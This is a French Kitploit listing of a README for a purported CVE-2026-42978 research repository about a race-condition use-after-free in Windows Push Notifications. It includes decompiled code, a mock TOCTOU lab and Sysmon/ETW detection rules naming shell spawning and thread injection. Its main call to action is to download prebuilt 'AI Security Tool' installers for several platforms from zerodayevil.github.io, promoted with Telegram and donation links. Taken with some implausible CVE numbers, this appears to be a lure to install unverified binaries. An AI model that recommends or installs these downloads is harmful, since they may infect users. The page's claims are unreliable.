Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-42978-PoC-Research — Recherche PoC sur une condition de course et un use-after-free dans Windows Push Notifications (WpnService) CVE-2026-42978, scanner de diagnostic et module d'audit de sécurité pour AI Security Tool. | Kitploit
Outils/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
Outils DéfensifsEscalade de PrivilègesScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationRenseignement sur les MenacesArticles et RechercheApprentissage et Éducation
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

Recherche PoC sur une condition de course et un use-after-free dans Windows Push Notifications (WpnService) CVE-2026-42978, scanner de diagnostic et module d'audit de sécurité pour AI Security Tool.

Voir le dépôtSite web
13il y a 17h 30mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-42978
Module Windows Push Notifications pour l'outil de sécurité IA

Écosystème de sécurité IA de nouvelle génération, terminal multi-protocole et suite d'agents autonomes


Latest Release Build Status Donations Telegram Channel License

Site web · Documentation produit · Application hôte · Chat communautaire

Navigation du site : Accueil · Mises à jour · Téléchargements · Modules

Module banner


Application hôte officielle

Produit : AI Security Tool
Site : zerodayevil.github.io
Docs : https://zerodayevil.github.io/ai-security-tool

Ce module est une analyse relue et un profil de vérification sécurisé pour AI Security Tool.
N'utilisez que les modules listés sur le site du projet ou dans le catalogue officiel. Chargez ce module à l'intérieur de l'application approuvée, contre des points de terminaison que vous possédez ou pour lesquels vous disposez d'une autorisation écrite d'évaluation.

Ce dépôt ne fournit pas d'exploit weaponisé contre WpnService. Le laboratoire sous lab/ est une maquette autonome de la classe de bug (TOCTOU / double-fetch). Il ne communique pas avec le véritable service de notifications push.


Démarrage rapide et installation

Installez d'abord l'application hôte. Activez ensuite ce module depuis Modules → Windows / Local EoP → CVE-2026-42978.

Builds prêts à l'emploi

OS / plateformeVersionArchitecture / formatMis à jourStatutTéléchargement
Windowsv6.3.20installateur x64 (.exe)2026-09-08DernièreTélécharger .exe
Windowsv6.3.20portable x64 (.tar.gz)2026-09-08DernièreTélécharger .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05StableTélécharger .dmg
Linuxv5.3.27Universel x64 (.tar.gz)2026-09-01StableTélécharger .tar.gz
Androidv5.3.27APK ARM64 (.apk)2026-09-01StableTélécharger .apk

Sources officielles uniquement :

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

Aperçu conceptuel

CVE-2026-42978 est une élévation de privilèges locale dans Windows Push Notifications. Microsoft décrit un accès concurrent à une ressource partagée sans synchronisation adéquate (CWE-362). La recherche sur wpncore.dll corrigé vs. non corrigé montre une race use-after-free dans PresentationEndpointFacade lors de l'arrêt de la plateforme.

WpnService s'exécute dans la session 0 en tant que NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). La livraison des toasts, tuiles et badges passe par lui. Une race gagnée contre ce processus est un problème SYSTEM sur la machine locale — pas un bug DC distant en pré-authentification.

Statut : corrigé le 10 juin 2026 (Patch Tuesday). Cette page relève de la recherche défensive.

Ce n'est pas CVE-2026-41089 (RCE Netlogon). Composant différent, modèle de privilèges différent, date de correctif différente.


Spécifications

ChampValeur
CVECVE-2026-42978
BDUBDU:2026-08249
Avis fournisseurMSRC — Windows Push Notifications EoP
SévéritéÉlevée · CVSS 3.1 7.8
FaiblesseCondition de course CWE-362 · use-after-free sur le chemin d'arrêt
ComposantWindows Push Notifications · WpnService · wpncore.dll
Vecteur d'attaqueLocal
Privilèges requisFaibles (utilisateur local autorisé)
Interaction utilisateurAucune
Patch Tuesday10 juin 2026
Type de moduleAnalyse de recherche + vérification sécurisée intégrée + pack de détection

Périmètre

SKU client et serveur qui embarquent Push Notifications. Confirmez le KB exact sur MSRC avant de clôturer un ticket.

FamilleNotes
Windows 101809, 21H2, 22H2 (x86 / x64 / ARM64 selon le cas)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (full et Server Core là où le composant existe)

Builds indicatifs d'après les notes de maintenance publiques (revérifiez toujours MSRC) :

BrancheBuild corrigé indicatif
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
Exemple wpncore.dll (24H2)vulnérable 26100.8521 → corrigé 26100.8655

Cause racine (recherche)

La façade encapsule les appels à l'API de notification et délègue à PresentationEndpointImpl. Lors de l'arrêt de la plateforme, l'objet NotificationPlatform est détruit. Plusieurs méthodes de la façade prenaient historiquement un pointeur de plateforme sans indicateur d'arrêt ni verrou partagé. Si le démontage gagne la course, l'appel suivant utilise un pointeur pendant.

Facade, platform, shutdown guard

Le même schéma verrou-et-garde a été appliqué sur 49 méthodes PresentationEndpointFacade::*. Les méthodes d'implémentation sous-jacentes ont été laissées telles quelles — la faille se situait au niveau de la façade.

Forme non corrigée (wpncore.dll 26100.8521)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

Forme corrigée (wpncore.dll 26100.8655)

root@kitploit:~
// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

Ce que le correctif ajoute :

  1. AcquireSRWLockShared — verrou lecteurs-écrivains ; l'arrêt prend l'exclusif.
  2. s_platformShutdown — sortie avec E_APPLICATION_EXITING si le démontage a commencé.
  3. Libération RAII via WIL unique_storage, afin que le verrou soit relâché sur les chemins d'exception.
  4. Feature flag Feature_4097557817 pour le déploiement progressif / le rollback.

Ampleur du diff binaire

CatégorieExemples de fonctions
ToastToastUnblockAll, ToastCreateSession, ToastCloseSession, ToastRequestAllNotifications, ToastSuppress
TileTileCreateSession, TileCloseSession, TileRequestResourceForeground
EnregistrementRegisterApplication, UnregisterApplication, RegisterHandler, UpdateRegistration
ParamètresChangeAppSetting, QueryAppSetting, QueryGlobalSetting
LivraisonDeliver, GetPayloadForNotificationId, Submit, PostScheduledNotification
RequêtesGetRegisteredHandler, GetSettingsFromHandler, GetAssetsFromHandler

Notes PE issues de reports/ :

  • .text a augmenté de 18 432 octets
  • .data a augmenté de 96 octets (Wns::s_platformLock, Wns::s_platformShutdown)
  • aucun nouvel import — les API de verrou SRW étaient déjà présentes
  • nouveau destructeur RAII pour la libération du verrou exclusif

Impact

WpnService est SYSTEM. Si la course est gagnée, un appel de vtable pendant peut être transformé en exécution de code SYSTEM local. Cette étape — heap spray, détournement de vtable, payload — est hors périmètre ici.

Ce module sert à la compréhension de la cause racine, à la vérification du correctif et à la détection.


Utilisation de ce module dans AI Security Tool

  1. Installez un build officiel à jour depuis zerodayevil.github.io.
  2. Ouvrez Modules → CVE-2026-42978.
  3. Pointez la vérification vers des points de terminaison Windows autorisés.
  4. Traitez le résultat comme une présence de correctif / posture WPN, et non comme « déclencher la race ».
  5. Collectez éventuellement le pack de détection (detection/) sur une machine de laboratoire.

Ne lancez pas de boucles de crash ou de race contre un WpnService de production.

root@kitploit:~
authorized operator
        │
        ▼
 AI Security Tool  →  module 42978
        │
        ▼
 authorized Windows endpoint
        │
        ├─ patch / wpncore.dll age
        └─ SIEM / Sysmon / Event Log notes

Laboratoire TOCTOU (service maquette uniquement)

lab/ est une démo C autonome de double-fetch / TOCTOU. Elle utilise un named pipe et de la mémoire partagée. Elle ne charge pas wpncore.dll et ne démarre ni n'arrête pas WpnService.

  • vulnerable_service.exe — valide une longueur, dort, relit la longueur.
  • race_attacker.exe — modifie la valeur partagée pendant cette fenêtre.
  • --patched — lecture unique dans une variable locale ; le même attaquant devrait observer zéro race.

Nécessite GCC (MinGW). Depuis lab/ :

root@kitploit:~
build.bat

Terminal 1 : vulnerable_service.exe
Terminal 2 : race_attacker.exe 5
Comparez ensuite avec vulnerable_service.exe --patched.

TOCTOU race condition demo


Détection et threat hunting

Moniteur ETW — detection/etw_wpn_monitor.ps1

Sept vérifications :

  1. État et PID de WpnService
  2. Historique de crash / redémarrage
  3. Rafale dans le journal d'événements Push Notifications Platform
  4. Named pipes liés à WPN
  5. Indice de correctif (date / build de wpncore.dll)
  6. Processus avec des modules WPN chargés
  7. Audit des jonctions / liens symboliques sous les chemins de données de notification
root@kitploit:~
powershell -ExecutionPolicy Bypass .\detection\etw_wpn_monitor.ps1

ETW monitor output

Sysmon — detection/sysmon_wpn_race_detect.xml

RègleÀ quoi elle sert
WPN_EoP_ChildProcesssvchost (netsvcs) lançant cmd / powershell / wscript
WPN_PipeAccessConnexions aux named pipes liés à WPN
WPN_FileCreationCréation de fichier sous les répertoires de données de notification
WPN_RegistryTamperingÉcritures sous les clés PushNotifications
WPN_ProcessAccessPROCESS_ALL_ACCESS vers svchost
WPN_ThreadInjectionCreateRemoteThread dans svchost
root@kitploit:~
sysmon64.exe -accepteula -i detection\sysmon_wpn_race_detect.xml

Observateur d'événements

Canal : Microsoft-Windows-PushNotifications-Platform/Operational

  • Événement 1225 — commandes WPN au niveau transport
  • Taux de rafale (par exemple >20/min) — à examiner, pas une preuve
  • Erreur / Critique — crash possible dû à une tentative échouée

Event Viewer WPN operational log


Liste de contrôle des mesures d'atténuation

  • Mise à jour cumulative de juin 2026 sur chaque SKU du périmètre
  • Le build de wpncore.dll correspond à la ligne corrigée de cette branche
  • EDR / Sysmon sur les postes de travail et les jump boxes, pas seulement les DC
  • Alerte sur svchost -k netsvcs lançant un shell
  • Résultat du module de l'application hôte archivé avec l'inventaire des correctifs

Si etw_wpn_monitor.ps1 indique non corrigé — installez la mise à jour de juin 2026 et revérifiez.


CVE associées (cluster WPN de juin 2026)

CVEClasse
CVE-2026-42977EoP · race
CVE-2026-42978EoP · race (ce module)
CVE-2026-42979EoP · race
CVE-2026-42991EoP · race
CVE-2026-42969Divulgation d'informations · race
CVE-2026-42970Divulgation d'informations · race
CVE-2026-42973Divulgation d'informations · race
CVE-2026-26167EoP
CVE-2026-32160EoP

Arborescence du dépôt

root@kitploit:~
CVE-2026-42978/
├── README.md
├── LICENSE
├── lab/
│   ├── vulnerable_service.c
│   ├── race_attacker.c
│   └── build.bat
├── detection/
│   ├── etw_wpn_monitor.ps1
│   └── sysmon_wpn_race_detect.xml
└── reports/
    ├── PE_DIFF_REPORT.txt
    └── FUNCTION_DIFF_REPORT.txt

Prérequis : Windows 10/11 pour les scripts de détection · MinGW pour le laboratoire maquette · Sysmon en option.

Les captures d'écran de ce README sont chargées depuis des URL d'images publiques. Elles ne sont pas stockées dans cette arborescence.


Références

  • MSRC — CVE-2026-42978
  • Enregistrement CVE
  • BDU:2026-08249

Catalogue des modules de sécurité

Exécution de code à distance et problèmes réseau 4 modules
  • CVE-2026-41089 — Module Windows Netlogon · @ZeroDayEvil
  • CVE-2026-20805 — Module Windows RCE · @ZeroDayEvil
  • CVE-2026-41096 — Module de vérification RCE critique · @ZeroDayEvil
  • CVE-2026-24291 — Module de protocole réseau · @ZeroDayVPN
Élévation de privilèges et services 2 modules
  • CVE-2026-66804 — EoP du service CrossDevice · @ZeroDayVPN
  • CVE-2026-42978 — EoP Windows Push Notifications (ce dépôt) · @ZeroDayEvil
Recherche et analyses 2 modules
  • CVE-2026-50416 — Analyse d'élévation de privilèges locale · @ZeroDayEvil
  • CVE-2026-83991 — Module d'analyse · @ZeroDayVPN

Contribution et communauté

Travaux utiles :

  1. Faits — builds MSRC, CVE sœurs du cluster WPN de juin.
  2. Détection — Sigma, meilleur ETW, recommandations ASR.
  3. Métadonnées de l'application hôte et traductions.
  4. Documentation et corrections de liens cassés.

N'ouvrez pas de PR qui ajoute un exploit weaponisé de WpnService, un assistant de heap-spray ou un PoC d'exploit contre le service en production.


Contact et support

  • Site web : zerodayevil.github.io
  • Documentation produit : zerodayevil.github.io/ai-security-tool
  • Admin Telegram : @ZeroDayEvil
  • Chat Telegram : @ZeroDyaTool_chat
  • Canal Telegram : @ZeroDyaTool_channel
  • Open Collective : opencollective.com/ZeroDayEvil

Licence et aspects légaux

Publié sous licence MIT. Voir LICENSE.

Recherche défensive autorisée et administration système uniquement.
Les tests d'élévation de privilèges locaux sans autorisation écrite sont illégaux.

La vulnérabilité est corrigée. Maintenez Windows à jour. Ce dépôt n'inclut pas d'exploit weaponisé contre le service en production.


AI Security Tool — flux de travail terminal et automatisation pour les professionnels de la cybersécurité.

Module défensif pour zerodayevil.github.io · Aucun exploit WpnService autonome · Vérifiez les faits sur MSRC

Télécharger l’outil